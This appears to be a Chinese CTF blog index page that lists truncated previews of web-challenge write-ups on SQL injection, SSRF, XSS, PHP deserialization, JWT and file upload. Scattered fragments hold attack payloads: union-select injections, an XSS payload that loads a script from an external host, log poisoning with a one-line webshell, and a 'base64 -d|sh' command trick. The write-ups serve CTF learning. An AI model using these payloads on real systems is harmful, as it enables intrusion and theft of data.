Y4tacker的博客

文章目录写在前面WebImage Service 1Image Service 2Easy PHPbypass绕过方法一绕过方法二绕过方法Ncover写在前面这周刚好比较空就抽了点时间打了下，质量挺高的还是WebImage Service 1注册个账号，发现密码不能是admin进去可以上传图片flag在admin账户上传的图片中 源码都被编译了感觉在任何地方输入admin 都会被ban，伪造header也都不行f12我查看源码的时候发现居然是支持表单提交不会逆向go，那无源码情况

文章目录Webnotebooknotebook2明天早上继续Webnotebook首先我们能看到文件，在urls.py里面查看路由我第一眼锁定了这个os.path.join函数如果参数是/flag那么后面经过函数处理就会是flag因此我们只需要传入{{/flag.txt}}按理说应该就能够得到flag，但是很不幸不可以在创建的时候这里进行了替换这里将..替换为空{{替换为空但这里因为先后顺序很明显有一个逻辑漏洞，因此我们只需要构造{..{/flag.txt}..}即可绕过读取

文章目录写在前面easyjava推荐文章写在前面昨天题目环境似乎出了点小问题,咋也不好问,咋也不敢说,题目有意思,当然还有其他链子猜测jdbc应该也可以打,没试过太懒了easyjava首先下载源码发现Java版本是1.7的,先放这里看看在evil路由下面,很明显是去触发反序列化,但是有过滤ban了这么多,cc链基本上不用想了,一方面是低版本不起作用,另一方面Transformer被ban了,看来只能用TemplatesImpl去执行字节码试一试,想到了Java7U21反序列化(可以看我博客分

文章目录写在前面齐博建站系统x1.0后台存在命令执行漏洞齐博建站系统x1.0企业版前台反序列化漏洞写在前面复现2021 DASCTF July X CBCTF 4th赛题齐博建站系统x1.0后台存在命令执行漏洞漏洞点在于application/admin/controller/Upgrade.php下的sysup函数跟入writelog,很有趣没有过滤进行直接拼接写入的是php文件有点傻因此我们直接访问http://yyds.top/admin.php/admin/upgrade/sy

文章目录写在前面babycat写在前面是Java没错了，冲它babycat发现接口直接post发包注册一个号登录进去此时我们可以看见不管怎样role都是guest，后台只有管理员有上传权限我们需要关注如何成为admin，但是文件下载那里可以目录穿越首先读取web.xml<web-app> <servlet> <servlet-name>register</servlet-name> <servlet-class&gt

文章目录写在前面入门fastapishell野兽先辈的文件Bypass_waf解法一解法二uploadez_uploadeasy_yii写在前面我出的题不太难，但是有意思，这里出个部分wp入门fastapi本来是作为一个签到题出的，事实上也是首先看到官网，有个能查到api的地方得到路径看到参数名，想到后端是eval，题目里面打错了是f10g，直接当然SSTI的方式也可以打出来，自己去找找学一学，看看我的这一篇shell倒是不难，出了点小事故后面又放了新的，这里写下预期preg

文章目录前言web517web518web519web520web521web522web523web524web525web526web527web528web529web530web531web532web533web534web535web536web537web538web539web540前言由于都是简单题就随便写了，SQL注入不懂的百度先学最基本的吧web517注意flag不在当前security里union select group_concat(schema_name) from

以本次虎符CTF为例，我们在进行常规SQL注入的时候，会遇到这几种情况①常常会因为构造网络请求麻烦②写tamper嫌麻烦这时候我们的中转注入就来了，这次的虎符CTF比赛当中有一个Web题需要我们频繁构造gopher去实现POST或者GET请求，这时候如果我们想要实现更自由的SQL注入，便可使用，下面直接放上脚本，请自行理解，一点不难from flask import Flask,requestfrom urllib.parse import quoteimport requestsdef

文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w

文章目录WebbaseWechatWebbase首先进去发现http://10xxx01/?user=QgcAYAbgbw，后面参数不对劲，尝试base全家桶操作失败，之后经过一番尝试发现每两个一位翻译成了字符，又看到robots.txtUser-agent: *Disallow: /base.txt继续访问得到编码，为了后面方便决定把他组合成一个字典import requestsres="{"with open("1.txt", 'r') as f: a = f.readl

首先拿到了一个apk，用7ZIP解压后 将classes.dex文件用dex2jar反汇编得到一个jar包，导进我的idea以后打开MainActivity分析逻辑，关键是这个onClick函数public void onClick(View param1View) { try { String str1 = MainActivity.this.text.getText().toString(); PackageInfo p

文章目录前言veryphp虎山行&虎山行's revengespaceman非预期预期(推荐不要看)有手就行参考文章前言这次比赛也很开心，学到了挺多东西，谢谢师傅们的出题veryphp打开环境代码审计，一堆过滤恶心，还好可以一层一层套下去<?phperror_reporting(0);highlight_file(__FILE__);include("config.php");class qwq{ function __wakeup(){ die("

文章目录[ACTF2020 新生赛]Include[ACTF2020 新生赛]Exec[ACTF2020 新生赛]Upload[ACTF2020 新生赛]BackupFile[ACTF2020 新生赛]Include打开环境，点击tips出现Can you find out the flag?观察到浏览器url的后缀变化?file=flag.php因此不难得到，应该用伪协议进行编码读取http://a7631c34-a214-4e36-9184-e1957ecc34c6.node3.buuo

文章目录前言JWT简介CTFSHOW Web345CTFSHOW Web346前置知识开始做题CTFSHOW Web347CTFSHOW Web348CTFSHOW Web349CTFSHOW Web350前置知识利用WP如何防御前言有些师傅向我咨询WP，索性就发了吧，其实早就写好了，只是懒，在github仓库里囤着JWT简介可以看看我的Github总结给自己看的，Y4tackerCTFSHOW Web345首先打开题目,查看源码，接下来访问/admin被跳转回主页啥也没有发生where is

web351首先代码审计，简简单单的使用php的curl，发现没有过滤，尝试读取本地文件<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_clo

web316http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3Eweb317-319http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28t

这里写自定义目录标题前言http走私攻击本题需要重点关注的析构函数SoapCLient+CRLF代码审计参考文章前言如果在代码审计中有反序列化点，但在代码中找不到pop链，可以利用php内置类来进行反序列化http走私攻击关于http走私攻击和实战大家可以参考下这篇文章：https://xz.aliyun.com/t/6654#toc-3本题需要重点关注的析构函数__call 在对象中调用一个不可访问方法时调用在这道题中$vip->getFlag();因为调用了类中没有的方法所以会导致_

文章目录前言前置知识代码审计简单分析函数说明以及预期解非预期解参考文章前言很开心今天拿了一个一血，也谢谢Firebasky师傅的题目了前置知识在php当中默认命名空间是\，所有原生函数和类都在这个命名空间中。普通调用一个函数，如果直接写函数名function_name()调用，调用的时候其实相当于写了一个相对路径；而如果写\function_name()这样调用函数，则其实是写了一个绝对路径。如果你在其他namespace里调用系统类，就必须写绝对路径这种写法代码审计简单分析传入参数a与b，如

文章目录前言给你shell前言学习网上各大佬的姿势进行学习，很开心给你shell审查元素，发现关键信息①<!--flag is in /flag.txt-->②<a href='./?view_source'下面进行最枯燥的代码审计环节啦~~<?phperror_reporting(0);include "config.php";//这句话没啥用跳过if (isset($_GET['view_source'])) { show_source(__FI

文章目录前言新手区web171web172web173web174前言看大家好像挺需要的所以在这里记录一下自己的脚本和payload，不做思路讲解，除非题目比较骚新手区可以看看我以前记录的小笔记SQL注入之MySQL注入的学习笔记(一)SQL注入之MySQL注入学习笔记(二)web171比较常规的题目不做讲解了，这里给出payload# 查数据库payload = "-1'union select 1,2,group_concat(table_name) from information

前言看到群里又那么多小伙伴想要一份WP，那就写一下吧，其实在我的网站上也有，只是比较简陋，这里比较详细的写一份吧，希望大家一起加油！！！开始写了预计今晚完成

文章目录web171web172web173方法一方法二web171普通的sql注入，不做讲解payload:1' union select id,username,password from ctfshow_user1 -- -web172普通的sql注入，不做讲解payload:1' union select id,username,password from ctfshow_user2 -- -web173方法一过滤了带有flag的输出，可以转换为16进制输出1' union se

文章目录签到_观己web1_观字参考文章前言：希望自己能一天天逐渐的改变签到_观己首先我尝试了一波data伪协议发现被禁止了，想了半天结果忘记了日志包含了害file=/var/log/nginx/access.log尝试在UA中放入一句话木马芜湖，起飞！system("ls /");结束web1_观字代码审计,题目的意思是想我们通过curl http://192.168.7.68/flag的回显得到flag,但是.被过滤了，然后我想到了把ip转换为数字，192.168.1.100

前言：我想提起最强的剑！文章目录考点WP部分啊这，这道题我不知道是啥，跟着别人的wp做吧考点SSRFWP部分首先题目是个提交框，可以提交一个 url 服务器会访问并转成 pdf 以供下载试一下file协议？？？提示invalid url，完全不知道干嘛抓包试一试,然后啥都没有，看了下wp，然后我一开始以为是内网环境，结果是直接访问公网憨批了是很不常见的 WeasyPrint，根据上面的考点，这个爬虫虽然不会渲染 js，但是却可以解析 <link attachment=xxx&g

前言：前几天刚刚在网上看到p师傅分享的python的f文章目录代码审计利用姿势参考链接代码审计然后看到有个source，点开看到一堆源码，关于什么是cgi下面有个菜鸟的链接可以看看#!/usr/bin/env python3import cgi;import sysfrom html import escapeFLAG = open('/var/www/flag','r').read()OK_200 = """Content-type: text/html<link rel

前言：很久没写博客了，虽然做了好多题，太懒了，这道题单纯就一个爬虫题目文章目录思路wp思路我们在每次请求都会有一个SecretState参数，用来保存游戏状态，并且在客户端和服务端同步。这个参数没法篡改。每次请求，服务端都会生成一个新的SecretState，但是旧的SecretState并不失效，问题就出在于此。游戏如果赢了，就更新SecretState，如果输了，则不更新SecretState。这样就可以达到类似一种分数只增不减的效果。但是有个问题，下注之后要开牌的话，必须得用新的Secret

在网页源代码当中发现因此我们只需要按顺序post三个value来战胜ai，我分别是ul,c,bl

文章目录[SUCTF 2019]EasyWeb[HFCTF2020]EasyLogin[SUCTF 2019]EasyWeb做了一半做不动了，换个时间来，花费了很多时间，不过会构造取反绕过了也不错[HFCTF2020]EasyLogin一开始以为是seesion伪造，发现我做错了，然后还加了转义字符，不知道怎么做了，看了别人的WP[HFCTF2020]EasyLogin[HFCTF2020]EasyLogin...

文章目录前置知识一些学到的新函数与新变量新变量属性-PHP_SELF新php函数-basenamebasename broken with non-ASCII-charsWP部分前置知识一些学到的新函数与新变量新变量属性-PHP_SELF$_SERVER['PHP_SELF'] 表示当前 php 文件相对于网站根目录的位置地址，与 document root 相关下面是本地测试截图，也就是http://.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']新ph

[极客大挑战 2019]Http太简单了[HCTF 2018]admin这里我才用的是flask-session伪造还有其它方式，给一个博主的链接BUUCTF | [HCTF 2018]admin

[极客大挑战 2019]LoveSQL太简单了 常规注入[RoarCTF 2019]Easy Calc学习了很多，php字符串解析绕过也学了一点点http走私，但是不太懂走私原理[GXYCTF2019]Ping Ping Ping学习了RCE一些绕过姿势 知道了echo sadsada|base64 -d|sh的意思了[极客大挑战 2019]Knife常规一句话木马[ACTF2020 新生赛]Exec也很简单，没有绕过[极客大挑战 2019]PHP超级简单的反序列化...

文章目录[FBCTF2019]RCEService[BSidesCF 2019]Kookie[CISCN2019 华北赛区 Day1 Web5]CyberPunk[极客大挑战 2019]Secret File[ACTF2020 新生赛]Include参考文章[FBCTF2019]RCEService题目源码<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) { $json = $_REQUEST

文章目录[GWCTF 2019]枯燥的抽奖[网鼎杯 2018]Comment[BJDCTF 2nd]elementmaster[MRCTF2020]套娃[HCTF 2018]WarmUp参考文章[GWCTF 2019]枯燥的抽奖打开题目是这玩意儿查看源代码！！！发现关键网页打开看看！！下面就是代码审计环节<?php #这不是抽奖程序的源代码！不许看！ header("Content-Type: text/html;charset=utf-8"); session_start();

文章目录[BSidesCF 2019]Futurella[BJDCTF 2nd]duangShell反弹姿势1(未成功)反弹姿势2[BSidesCF 2019]Futurella好久没看过这么简单的题目了，哇哇哇整了个火星文，看不懂查看源代码[BJDCTF 2nd]duangShell点进去发现是swp源码泄露利用vim -r index.php.swp恢复文件这里我知道了exec函数与system类似但是没有回显，所以我传入的参数girl_friend=print_r(scandir(

前言：我要当赛棍!!!文章目录序列化与反序列化基本介绍PHP反序列化漏洞原理常用的魔法函数__wakeup()绕过:CVE-2016-7124__set:巅峰极客babyphp2bypass phar:// 不能出现在首部本题关键源码Phar利用参考文章序列化与反序列化基本介绍序列化是将变量转换为可保存或传输字符串的过程反序列化就是在适当的时候把这个字符串再转化成之前的变量来使用php进行序列化的目的是保存一个对象方便以后重用php提供了serialize和unserialize函数用以进行

文章目录前置知识session 的存储机制利用session.upload_progress进行文件包含和反序列化渗透wp前置知识session 的存储机制php中的session中的内容并不是放在内存中的，而是以文件的方式来存储的，存储方式就是由配置项session.save_handler来进行确定的，默认是以文件的方式存储。存储的文件是以sess_sessionid来进行命名的php : 默认使用方式，格式 键名|键值(经过序列化函数处理的值)php_serialize: 格式 经过序列

首先通过关键字过滤ICMP之后，从题目Length猜出可能与长度有关，我们知道这个平台默认flag开头是ctfhub{}，发现c与f相差3个ascii码值，查看数据包也是一样的接下来把每条长度读取即可，根据记录可以得到flag#!/usr/bin/python# coding=utf8# @Author:Y4tackernum = ord('c')num = 141 - numnum_list = [不可能给你自己研究哈，不吃白食]new_list = []for i in num

直接异或给的串中所有字符文件名改为你网上下载的那个文件with open('task', 'rb') as f: b = f.readlines()print(b)c = b''for i in b: c += iprint(c)data = list(c)print(data)for k in range(200): flag = "" for i in range(len(data)): flag += chr(data[i] ^ o

首先上传一下一句话木马文件，发现没有过滤，但是无论如何我们都找不到那个文件地址，猜想可能有源码泄露通过目录扫描发现文件.index.php.swp，关于.swp格式文件是异常退出时linux生成的，具体可以百度之后访问后，我们得到这个文件，推荐用linux的vim打开，但是考虑到这道题比较简单，直接记事本吧，发现文件名的规则打个比方，就如上传的这个文件，那么的格式应该是url+20200826024904+(0-999的随机数)+.php知道这个规则后我写了个多线程的Python脚本，如果找

发现过滤了一堆比如*空格之类的我们用()绕过上脚本，网站太垃圾了请求的快，就要出错，还要加一个sleep等一下import timeimport requestsurl = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id="result = ''i = 0while True: i = i + 1 head = 32 tail = 127 while h